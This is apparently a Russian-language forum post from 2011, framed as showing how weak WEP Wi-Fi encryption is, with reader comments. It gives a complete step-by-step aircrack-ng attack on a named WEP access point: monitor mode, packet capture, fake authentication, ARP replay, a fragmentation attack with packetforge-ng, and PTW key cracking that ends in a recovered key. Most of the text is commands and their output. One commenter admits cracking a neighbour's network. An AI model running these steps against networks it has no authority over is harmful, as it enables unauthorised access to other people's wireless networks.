Инструкция показывающая какой не эффективный способ шифровать WiFi с помощью WEP.
Нам понадобиться этот LiveCD http://www.backtrack-linux.org/downloads/
После того как его скачали, записали на  болванку, перезагружаем  компьютер и загружаемся с этого диска. Когда появиться вопрос Boot linux,нажимаем ентер, после будет красный экран с текстом, там выбираем самый первый вариант. когда появиться чёрный экран с root@root: пишем там startx, ждём загрузки OS как на картинке.



Далее сама инструкция!






Текст написанный таким способом, это команды в консоль, которые не обходимо написать самому
Такой текст - выделение различных параметров
Итак приступим:
открываем консоль, и переводим  нужную карточку в  режим монитора

root@root:~# airmon-ng
Interface       Chipset         Driver
wlan0           Broadcom        b43 - [phy0]
wlan1           Atheros AR9287  ath9k - [phy1]


Будем переводить wlan1           Atheros AR9287
если бы  переводили Broadcom то писали бы wlan0

root@root:~#airmon-ng start wlan1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
2752    dhclient3
2816    dhclient3
Process with PID 2816 (dhclient3) is running on interface wlan0
Interface       Chipset         Driver

wlan0           Broadcom        b43 - [phy0]
wlan1           Atheros AR9287  ath9k - [phy1]
                                (monitor mode enabled on mon0)


Карточка успешно перевелась в режим монитора, хотя немного поругалась на dhcp демона
Теперь делаем поиск сети, и наш новый интерфейс mon0
Чтобы остановить поиск нажимаем ctrl+C

root@root:~# airodump-ng --encrypt wep mon0
                                                          
BSSID                      PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER ESSID                      
                                                                                                      
00:0B:6B:15:90:A2   -79        4              1       0      1  54 . WEP  WEP         AxessMV400                  
54:E6:FC:B2:8C:AC  -80        7              0        0     1  54 . WEP  WEP         malishnya                  
00:25:9C:21:49:61   -81       13              0       0     11  54 . WEP  WEP         linksys    

Далее выбираем нужную точку и начинаем собирать данные в файл file1 - -w file1
Сбор данных следует производить на том же канале, который показан в графе CH, в нашем случае это первый канал, поэтому указываем  -c 1, в --bssid указываем BSSID нужной точки, он виден в окне поиска
                  
root@root:~# airodump-ng  –c  1 --bssid 00:0B:6B:15:90:A2 -w file1 mon0
[CH  1 ][ Elapsed: 4 s ][ 2011-11-27 16:53                                        
                                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                  
                                                                                                      
00:0B:6B:15:90:A2  -80  44       32        0    0   1  54 . WEP  WEP         AxessMV400              
                                                                                                      
BSSID              STATION            PWR   Rate    Lost  Packets  Probes      


Оставляем сбор данных работать, и открываем новое окно консоли. Там делаем проверку на доступ к точке, в поле указываем тот же BSSID что и в прошлый раз
    
root@root:~# aireplay-ng -1 0 -a 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:28:51  Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1

16:28:51  Sending Authentication Request (Open System) [ACK]
16:28:51  Authentication successful
16:28:51  Sending Association Request [ACK]


Если видим что "Authentication successful" значит точка открыта, иногда с первого раза  такого ответа нет, стоит попробовать  ещё пару раз выполнить проверку ( просто нажать стрелочку вниз и будет та же команда)
После того как всё прошло успешно, выполняем генерацию ARP пакетов, для получения векторов. -b пишем наш BSSID. Если всё идёт успешно, то  открываем ту консоль где был сбор,и смотрим в поле Data число будет увеличиваться, если всё так, то переходим к "Подбору пароля" в самом низу этой инструкции.

root@root:~# aireplay-ng -3 -b 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:29:28  Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
Saving ARP requests in replay_arp-1127-162928.cap
You should also start airodump-ng to capture replies.
97617 packets (got 0 ARP requests and 5 ACKs), sent 0 packets...(0 pps)


В случае если генерация  не успешна - "97617 packets (got 0 ARP requests and 5 ACKs), sent 0 packets...(0 pps)" после того как было получено 97617 пакетов, это значит что точка не отдала ни одного ARP пакета и aireplay-ng  не смог ничего отправит. Останавливаем генерацию нажатием ctrl+C. Далее  Собирём ARP пакет в ручную. Первым шагом будет генерация ACK, как обычно наш BSSID

root@root:~# aireplay-ng -1 100 -a 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:28:51  Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1

16:28:51  Sending Authentication Request (Open System) [ACK]
16:28:51  Authentication successful
16:28:51  Sending Association Request [ACK]

16:28:51  Association successful :-) (AID: 1)



Оставляем генерацию работать, и открываем новую консоль. Начинаем ловить keystream из которого потом будем собирать ARP пакет.-b наш BSSID

root@root:~# aireplay-ng -5 -b 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:43:22  Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
16:43:22  Waiting for a data packet...
Read 86524 packets...

        Size: 187, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:0B:6B:15:90:A2
          Dest. MAC  =  01:00:5E:40:98:8F
         Source MAC  =  00:12:F0:3A:7D:49

        0x0000:  0842 0000 0100 5e40 988f 000b 6b15 90a2  .B....^@....k...
        0x0010:  0012 f03a 7d49 6050 00fc 0e00 9dc4 ea80  ...:}I`P........
        0x0020:  d914 0290 46af b9c5 7ce6 9ee2 cd37 3ffe  ....F...|....7?.
        0x0030:  3191 a2ef b221 a4f5 27bf 08c4 5047 64b3  1....!..'...PGd.
        0x0040:  6619 806a 9890 2a17 1693 b902 6e2f 7770  f..j..*.....n/wp
        0x0050:  f019 645b 1d9a c764 a419 34c6 2843 7d60  ..d[...d..4.(C}`
        0x0060:  fb8e 3474 d8d1 abc5 4773 c22d 17bc df17  ..4t....Gs.-....
        0x0070:  ad03 9afc 82af 714b d1fe b644 e284 1880  ......qK...D....
        0x0080:  0506 f7fb e29b e95a c654 1437 2f0b 69e9  .......Z.T.7/.i.
        0x0090:  edb4 9e94 ea7e 3a72 28e7 8772 9af0 0de6  .....~:r(..r....
        0x00a0:  e92d 888e 2564 0e2b 49cb d6c5 e80b 664b  .-..%d.+I.....fK
        0x00b0:  1083 d9e3 e567 f205 f78d ac              .....g.....
Ловим этот самый пакет, пока не появиться вопрос "Use this packet?" В ответ мы нажимаем "y"

Use this packet ? y

Saving chosen packet in replay_src-1127-164553.cap
16:46:06  Data packet found!
16:46:06  Sending fragmented packet
16:46:06  Got a disassociation packet!
16:46:11  Not enough acks, repeating...
16:46:11  Sending fragmented packet
16:46:11  Got RELAYED packet!!
16:46:11  Trying to get 384 bytes of a keystream
16:46:12  Not enough acks, repeating...
16:46:20  Trying to get 1500 bytes of a keystream
16:46:20  Got RELAYED packet!!
Saving keystream in fragment-1127-164620.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


Всё, keystream пойман и сохранён в "fragment-1127-164620.xor"
Далее мы создаём свой ARP пакет. -a наш BSSID; -y имя xor файла, в нашем случаее это fragment-1127-164620.xor; -w имя файла с нашим ARP пакетом - arpme

root@root:~# packetforge-ng -0 -a 00:0B:6B:15:90:A2 -h FF:FF:FF:FF:FF:FF -k 192.168.1.1 -l 192.168.1.101 -y fragment-1127-164620.xor -w arpme
Wrote packet to: arpme


После того как пакет создан, отправляем его на точку и ждём IV вектора. -r имя файла с нашим ARP пакетом "arpme"; -b наш BSSID

root@root:~# aireplay-ng -3 -r arpme -b 00:0B:6B:15:90:A2 mon0
No source MAC (-h) specified. Using the device MAC (B0:48:7A:B7:4F:63)
16:47:19  Waiting for beacon frame (BSSID: 00:0B:6B:15:90:A2) on channel 1
Saving ARP requests in replay_arp-1127-164719.cap
You should also start airodump-ng to capture replies.
320110 packets (got 73991 ARP requests and 31816 ACKs), sent 84532 packets...(500 pps)


Как видно в данный момент, генерация прошла успешно, и точка начала отдавать вектора "(got 73991 ARP requests and 31816 ACKs), sent 84532 packets..." Для проверки переключитесь на окно сбора данных и обратите внимание, что поле Data стало заполнятся.
Далее делаем подбор пароля. -n это глубина шифрования, бывает 64;128;152;256;512, но обычно используеться 64 или 128. -b наш BSSID. В конце команды указываем наш файл file1 и добавляем к нему -01.cap, в итоге получается file1-01.cap
Подбор будет происходит до тех пор пока не подберёт  правильный ключ,  если векторов мало то aircrack будет ждать следующие 5 тысяч векторов, и повторит подбор. Что бы остановить подбор и поменять  глубину шифрования, нажимаем ctrl+C

root@root:~# aircrack-ng -n 128 -b 00:0B:6B:15:90:A2 file1-01.cap
Opening ne1-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 18625 ivs.

                                            Aircrack-ng 1.1 r1904


                            [00:00:02] Tested 17019 keys (got 18266 IVs)

   KB    depth   byte(vote)
    0    5/  6   14(23296) AC(22528) D6(22528) 61(22272) 50(22016) 69(22016) B9(22016)
    1    0/  1   08(31488) 50(26624) E9(25344) 47(23808) EF(23552) 75(23296) 9F(23040)
    2    0/ 13   B5(25088) 0E(24832) 37(24320) A0(23040) C4(23040) 5F(22528) 9E(22528)
    3    9/ 13   DC(22528) 6F(22272) C1(22272) D4(22272) 11(22016) 42(22016) 68(22016)
    4    0/ 17   4B(24832) 8D(23552) F2(23552) 38(23296) 3B(23296) 54(23296) 5A(23296)

                         KEY FOUND! [ 14:08:B5:03:4B ]
        Decrypted correctly: 100%


root@root:~#
Ну вот и всё, ключ получен, для входа на точку пишем его без двоеточий и большими буквами

Комментарии (7)

ROLLERI LV 28. ноября, 2011.г.  
 0 0
Тока автору стоило бы упомянуть, что взлом сети  - уголовно наказуемое деяние.

а скачивать не наказуемо? или тут все, все покупают
CAXAP 28. ноября, 2011.г.  
 0 0
Это не взлом. Это демонстрация ;)
CAXAP 28. ноября, 2011.г.  
 0 0
ну куда уж проще, 6 команд в 1 случае и 10 во втором. хотя   кому наверное  кликать проще, но там обычно начинается  конфликт драйверов итд итп
V0VA 28. ноября, 2011.г.  
 0 0
Тока автору стоило бы упомянуть, что взлом сети  - уголовно наказуемое деяние.
Uranium (37) 28. ноября, 2011.г.  
 0 0
WEPом сейчас мало кто пользуется. А вот дайте инструкции на wpa2-psk.
Kukish 28. ноября, 2011.г.  
 0 0
Инструкция показывающая какой не эффективный способ шифровать WiFi с помощью WEP.
кто-то ещё не пользуется WPA2? O_o
V0VA 28. ноября, 2011.г.  
 0 0
И действительно - легче не придумаешь :)))
Но способ рабочий. Я так 4 года назад, пытаясь поломать соседскую, собственную сетку взломал...
Похожие записи

CAXAP